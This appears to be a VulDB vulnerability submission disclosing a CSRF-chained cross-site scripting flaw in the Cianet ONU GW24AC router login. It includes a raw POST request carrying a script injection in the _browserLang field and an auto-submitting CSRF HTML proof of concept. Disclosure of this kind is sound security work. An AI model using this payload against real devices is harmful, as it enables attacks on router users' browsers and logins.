Gửi #489867: Cianet ONU GW24AC Cross-Site Request Forgerythông tin

tiêu đềCianet ONU GW24AC Cross-Site Request Forgery
Mô tảThis vulnerability allows you to take advantage of the browserLang parameter to inject malicious code and use the fact that there is no CSRF token for the login request, allowing you to concatenate the CSRF vulnerability with XSS. To reproduce, simply save the HTML code provided below in a .html file and open it in your browser, which will show the alert prompt as proof of concept. # Request POST / HTTP/1.1 Referer: https://x.x.x.x/ Content-Type: application/x-www-form-urlencoded Content-Length: 173 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Host: x.x.x.x Connection: Keep-alive Frm_Logintoken=BzenyKyK&Password=u]H[ww6KrA9F.x-F&Username=BzenyKyK&_browserLang=19409"();}]9074"></script></script><script>alert('c4ng4c3ir0')</script>&_lang=1&action=login&frashnum=1 #CSRF HTML <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://x.x.x.x/" method="POST"> <input type="hidden" name="Frm&#95;Logintoken" value="BzenyKyK" /> <input type="hidden" name="Password" value="u&#93;H&#91;ww6KrA9F&#46;x&#45;F" /> <input type="hidden" name="Username" value="BzenyKyK" /> <input type="hidden" name="&#95;browserLang" value="19409&quot;&#40;&#41;&#59;&#125;&#93;9074&quot;&gt;&lt;&#47;script&gt;&lt;&#47;script&gt;&lt;script&gt;alert&#40;9&#41;&lt;&#47;script&gt;" /> <input type="hidden" name="&#95;lang" value="1" /> <input type="hidden" name="action" value="login" /> <input type="hidden" name="frashnum" value="1" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>
Người dùng
 c4ng4c3ir0 (UID 38456)
Đệ trình27/01/2025 05:22 (cách đây 1 Năm)
Kiểm duyệt30/01/2025 09:29 (3 days later)
Trạng tháiđược chấp nhận
Mục VulDB294055 [Cianet ONU GW24AC đến 20250127 Login browserLang Tập lệnh chéo trang]
điểm17

Do you know our Splunk app?

Download it now for free!